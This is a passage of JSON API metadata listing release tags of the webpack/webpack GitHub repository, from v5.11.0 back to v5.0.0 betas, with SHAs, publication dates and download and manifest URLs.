.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8